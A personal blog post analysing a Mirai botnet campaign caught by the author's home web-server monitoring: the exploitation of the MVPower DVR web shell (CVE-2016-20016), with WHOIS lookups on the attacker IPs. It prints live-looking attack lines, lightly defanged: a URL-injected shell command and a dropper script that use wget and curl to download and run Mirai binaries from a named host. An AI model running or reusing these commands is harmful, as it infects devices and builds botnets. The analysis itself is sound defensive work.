Christopher Chmielewski

BOLO: Mirai Attack Against IoT Devices

Table of Contents

January 6, 2025

1. Introduction

I have been running a home web server to host this website for the last 9 months. Over the Christmas break I setup a home SOC (Security Operations Center) to help monitor the traffic to my website more easily as opposed to viewing the web server logs directly. After setting up syslog and Splunk, I dug into the log data to see what kind of attacks the server is facing. There are of course a lot.

One set of log events stuck out to me as curious because the attacker had modified their user-agent string to "KrebsOnSecurity". For those of you who are unaware, KrebsOnSecurity is the website of Brian Krebs, a leading cybersecurity investigative journalist. Brian Krebs has been targeted by threat actors in the past due to him exposing various cybercriminals. Perhaps this attacker changed his user-agent string as a joke.

Note that I've modified HTTP to HTTX for safety in the listings below. 

2025-01-04T00:03:36-05:00 cyrodiil http_access 91.224.92.18 - - [04/Jan/2025:00:03:36 -0500] GET /shell?cd+/tmp;rm+-rf+j;nohup+wget+httx:/\\/194.37.81.64/random.sh;chmod+777+random.sh;./random.sh HTTP/1.1 404 492 - KrebsOnSecurity 
2025-01-03T20:40:07-05:00 cyrodiil http_access 91.224.92.18 - - [03/Jan/2025:20:40:07 -0500] GET /shell?cd+/tmp;rm+-rf+j;nohup+wget+httx:/\\/194.37.81.64/random.sh;chmod+777+random.sh;./random.sh HTTP/1.1 404 492 - KrebsOnSecurity 
2025-01-03T17:47:03-05:00 cyrodiil http_access 91.224.92.18 - - [03/Jan/2025:17:47:03 -0500] GET /shell?cd+/tmp;rm+-rf+j;nohup+wget+httx:/\\/194.37.81.64/random.sh;chmod+777+random.sh;./random.sh HTTP/1.1 404 492 - KrebsOnSecurity 
2025-01-03T14:28:24-05:00 cyrodiil http_access 91.224.92.18 - - [03/Jan/2025:14:28:24 -0500] GET /shell?cd+/tmp;rm+-rf+j;nohup+wget+httx:/\\/194.37.81.64/random.sh;chmod+777+random.sh;./random.sh HTTP/1.1 404 492 - KrebsOnSecurity 
2025-01-03T11:51:18-05:00 cyrodiil http_access 91.224.92.18 - - [03/Jan/2025:11:51:18 -0500] GET /shell?cd+/tmp;rm+-rf+j;nohup+wget+httx:/\\/194.37.81.64/random.sh;chmod+777+random.sh;./random.sh HTTP/1.1 404 492 - KrebsOnSecurity 
2025-01-03T09:01:26-05:00 cyrodiil http_access 91.224.92.18 - - [03/Jan/2025:09:01:26 -0500] GET /shell?cd+/tmp;rm+-rf+j;nohup+wget+httx:/\\/194.37.81.64/random.sh;chmod+777+random.sh;./random.sh HTTP/1.1 404 492 - KrebsOnSecurity 
2025-01-03T02:58:12-05:00 cyrodiil http_access 91.224.92.18 - - [03/Jan/2025:02:58:12 -0500] GET /shell?cd+/tmp;rm+-rf+j;nohup+wget+httx:/\\/194.37.81.64/random.sh;chmod+777+random.sh;./random.sh HTTP/1.1 404 492 - KrebsOnSecurity 
2025-01-02T18:57:10-05:00 cyrodiil http_access 91.224.92.18 - - [02/Jan/2025:18:57:10 -0500] GET /shell?cd+/tmp;rm+-rf+j;nohup+wget+httx:/\\/194.37.81.64/random.sh;chmod+777+random.sh;./random.sh HTTP/1.1 404 492 - KrebsOnSecurity 
2025-01-02T15:13:22-05:00 cyrodiil http_access 91.224.92.18 - - [02/Jan/2025:15:13:22 -0500] GET /shell?cd+/tmp;rm+-rf+j;nohup+wget+httx:/\\/194.37.81.64/random.sh;chmod+777+random.sh;./random.sh HTTP/1.1 404 492 - KrebsOnSecurity

2. Infiltration: Web Shell for Free

The log events show that the attacker is attempting to get shell access to the web server in order to download a script called random.sh that when executed downloads malware onto the system.

It seemed odd to me that the exploit this attacker was attempting directly called the system shell and passed commands to the shell as a URL parameter: GET /shell?cd+/tmp;rm+-rf+j;nohup+wget+httx:/\\/194.37.81.64/random.sh;chmod+777+random.sh;./random.sh. This seemed too simple. What kind of web server allowed direct shell access like this? From my previous project I learned that gaining shell access remotely on a web server typically relies on a combination of vulnerabilities such as server misconfiguration and software vulnerabilities.

Digging around online I found CVE-2016-20016, also known as the "JAWS webserver RCE". According to the sources listed under the CVE this attack is targeting MVPower CCTV DVRs, which are DVRs used for recording the video feeds from CCTV cameras. A full technical explanation of the vulnerabilities in this device can be found here (also archived here as a PDF) in a penetration testing report from pentestpartners.com, the section "Built-in web shell" covers the vulnerability our attacker is attempting to exploit. Reading this report reveals that this is a horridly insecure device. To quote the report "we have a remote, unauthenticated root shell, that is undocumented and not possible to disable, built-in to the device. This is as bad as it gets".

3. Mirai Malware

Once random.sh (see the VirusTotal report) is executed, it downloads and executes a binary labeled Aqua.XXX where each extension presumably corresponds to a different instruction set architecture (ISA). I downloaded a copy of this malware in a VM (virtual machine) and uploaded it to VirusTotal in order to ID it (see the VirusTotal report). Turns out it's the well known Mirai malware, which is used to turn Linux machines, IoT devices in particular, into bots for a botnet. In fact this very malware was used to DDoS (distributed denial of service) krebsonsecurity.com in 2016. Perhaps this explains the "KrebsOnSecurity" user-agent string. 

cd /tmp; wget httx://194.37.81.64/Aqua.x86; curl -O httx://194.37.81.64/Aqua.x86; chmod 777 *; ./Aqua.x86 jaws;
cd /tmp; wget httx://194.37.81.64/Aqua.x86_64; curl -O httx://194.37.81.64/Aqua.x86_64; chmod 777 *; ./Aqua.x86_64 jaws;
cd /tmp; wget httx://194.37.81.64/Aqua.arm7; curl -O httx://194.37.81.64/Aqua.arm7; chmod 777 *; ./Aqua.arm7 jaws;
cd /tmp; wget httx://194.37.81.64/Aqua.arm6; curl -O httx://194.37.81.64/Aqua.arm6; chmod 777 *; ./Aqua.arm6 jaws;
cd /tmp; wget httx://194.37.81.64/Aqua.arm5; curl -O httx://194.37.81.64/Aqua.arm5; chmod 777 *; ./Aqua.arm5 jaws;
cd /tmp; wget httx://194.37.81.64/Aqua.arm4; curl -O httx://194.37.81.64/Aqua.arm4; chmod 777 *; ./Aqua.arm4 jaws;
cd /tmp; wget httx://194.37.81.64/Aqua.mips; curl -O httx://194.37.81.64/Aqua.mips; chmod 777 *; ./Aqua.mips jaws;
cd /tmp; wget httx://194.37.81.64/Aqua.mpsl; curl -O httx://194.37.81.64/Aqua.mpsl; chmod 777 *; ./Aqua.mpsl jaws;
cd /tmp; wget httx://194.37.81.64/Aqua.ppc; curl -O httx://194.37.81.64/Aqua.ppc; chmod 777 *; ./Aqua.ppc jaws;
cd /tmp; wget httx://194.37.81.64/Aqua.sh4; curl -O httx://194.37.81.64/Aqua.sh4; chmod 777 *; ./Aqua.sh4 jaws;
cd /tmp; wget httx://194.37.81.64/Aqua.i686; curl -O httx://194.37.81.64/Aqua.i686; chmod 777 *; ./Aqua.i686 jaws;
cd /tmp; wget httx://194.37.81.64/Aqua.m68k; curl -O httx://194.37.81.64/Aqua.m68k; chmod 777 *; ./Aqua.m68k jaws;
cd /tmp; wget httx://194.37.81.64/Aqua.mips; curl -O httx://194.37.81.64/Aqua.mips; chmod 777 *; ./Aqua.mips jaws;

4. Attacker Operational Details

The attacker initially makes a HTTP GET request to exploit CVE-2016-20016 from IP address 91.224.92.18, located in Vilnius, Lithuania. This IP address belongs to a datacenter company called serveroffer.net.

Once the attacker gains shell access he attempts to download the Mirai malware from IP address 194.37.81.64 located in Amsterdam, Netherlands which belongs to another datacenter kamatera.com.

I have reported the attacker to both of these datacenters' abuse emails. 

% This is the RIPE Database query service.
% The objects are in RPSL format.
%
% The RIPE Database is subject to Terms and Conditions.
% See https://docs.db.ripe.net/terms-conditions.html

% Note: this output has been filtered.
%       To receive output for a database update, use the "-B" flag.

% Information related to '91.224.92.0 - 91.224.92.255'

% Abuse contact for '91.224.92.0 - 91.224.92.255' is 'admin@serveroffer.lt'

inetnum:        91.224.92.0 - 91.224.92.255
netname:        SERVEROFFER_LT
org:            ORG-UHB2-RIPE
descr:          Cloud hosting
country:        LT
geoloc:         54.669531 25.270872
admin-c:        SA36963-RIPE
tech-c:         SA36963-RIPE
status:         ASSIGNED PA
mnt-by:         BSTLT-MNT
created:        2019-07-03T19:41:09Z
last-modified:  2019-07-03T19:41:09Z
psource:         RIPE

organisation:   ORG-UHB2-RIPE
org-name:       UAB Host Baltic
org-type:       OTHER
address:        Draugystes str. 19, 51230 Kaunas, LITHUANIA
abuse-c:        SA36963-RIPE
mnt-ref:        BSTLT-MNT
mnt-by:         BSTLT-MNT
created:        2016-10-05T09:56:12Z
last-modified:  2016-10-05T09:56:12Z
source:         RIPE # Filtered

role:           Serveroffer admin
address:        UAB Host Baltic, Draugystes str. 19, 51230 Kaunas, LITHUANIA
abuse-mailbox:  admin@serveroffer.lt
nic-hdl:        SA36963-RIPE
mnt-by:         BSTLT-MNT
created:        2016-10-05T09:49:18Z
last-modified:  2016-10-05T09:55:58Z
source:         RIPE # Filtered

% Information related to '91.224.92.0/24AS133398'

route:          91.224.92.0/24
descr:          UAB Host Baltic
origin:         AS133398
mnt-by:         BSTLT-MNT
created:        2019-03-16T00:18:00Z
last-modified:  2019-03-16T00:18:42Z
source:         RIPE

% Information related to '91.224.92.0/24AS209605'

route:          91.224.92.0/24
descr:          UAB Host Baltic
origin:         AS209605
mnt-by:         BSTLT-MNT
created:        2023-03-20T00:06:15Z
last-modified:  2023-03-20T00:06:15Z
source:         RIPE

% This query was served by the RIPE Database Query Service version 1.114 (SHETLAND)

% This is the RIPE Database query service.
% The objects are in RPSL format.
%
% The RIPE Database is subject to Terms and Conditions.
% See https://docs.db.ripe.net/terms-conditions.html

% Note: this output has been filtered.
%       To receive output for a database update, use the "-B" flag.

% Information related to '194.37.81.0 - 194.37.81.255'

% Abuse contact for '194.37.81.0 - 194.37.81.255' is 'abuse@cloudwm.com'

inetnum:        194.37.81.0 - 194.37.81.255
netname:        CLOUDWEBMANAGE-EU
country:        NL
mnt-by:         CloudWebManage-MNT
admin-c:        CWM7-RIPE
tech-c:         CWM7-RIPE
status:         ASSIGNED PA
geofeed:        https://www.kamatera.com/geofeed.csv
created:        2024-02-28T10:35:25Z
last-modified:  2024-02-28T10:35:25Z
source:         RIPE

role:           Cloud Web Manage
admin-c:        YA57445-RIPE
tech-c:         YA57445-RIPE
address:        15 Madison Ave., New York City, New York, USA
nic-hdl:        CWM7-RIPE
mnt-by:         CloudWebManage-MNT
created:        2016-08-23T19:39:53Z
last-modified:  2019-12-01T17:59:28Z
source:         RIPE # Filtered
abuse-mailbox:  abuse@cloudwm.com

% Information related to '194.37.81.0/24AS41436'

route:          194.37.81.0/24
descr:          CLOUDWEBMANAGE-EU
origin:         AS41436
mnt-by:         CloudWebManage-MNT
created:        2024-02-28T10:36:00Z
last-modified:  2024-02-28T10:36:00Z
source:         RIPE

% This query was served by the RIPE Database Query Service version 1.114 (SHETLAND)

5. Conclusion

The exploitation of the web shell (CVE-2016-20016) and hijacking of MVPower CCTV DVRs as bots is the one of the modus operandi of the 2016 Mirai DDoS attacks. It's interesting to note that in 2025 this exact MO is still being used, which implies that many of the affected IoT devices, MVPower CCTV DVRs and surely many others, are still online and unpatched (many IoT devices are not patchable) 9 years after they where originally exploited, making it worthwhile for attackers to continue to target these devices in order to create botnets.